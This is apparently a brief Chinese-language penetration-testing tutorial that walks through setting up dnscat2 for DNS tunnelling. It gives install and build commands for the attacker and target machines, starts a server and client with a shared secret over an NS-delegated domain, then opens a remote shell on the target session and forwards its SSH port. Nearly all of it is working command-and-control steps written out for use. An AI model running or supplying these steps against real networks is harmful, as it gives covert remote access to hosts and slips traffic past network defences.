工具

• Dnscat2

使用步骤

中继模式

• dnscat2 攻击机安装

apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

• 目标机器上编译

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

*make编译之后会在此目录下生成一个dnscat可执行二进制文件。

• DNS服务器配置 NS 记录，将子域名指向域名服务器解析

• 服务端启动

ruby ./dnscat2.rb dnsch.qq.cn --secret=passwd

• 客户端启动

./dnscat --secret=passwd dnsch.qq.cn

• 服务端接收会话后执行

windows
session -i 1
shell
listen 127.0.0.1 2222 <客户端ip> 22    将客户端22端口流量转发到2222端口

• 可以使用命令查看linux主机上的dns流量特征

tcpdump udp dst port 53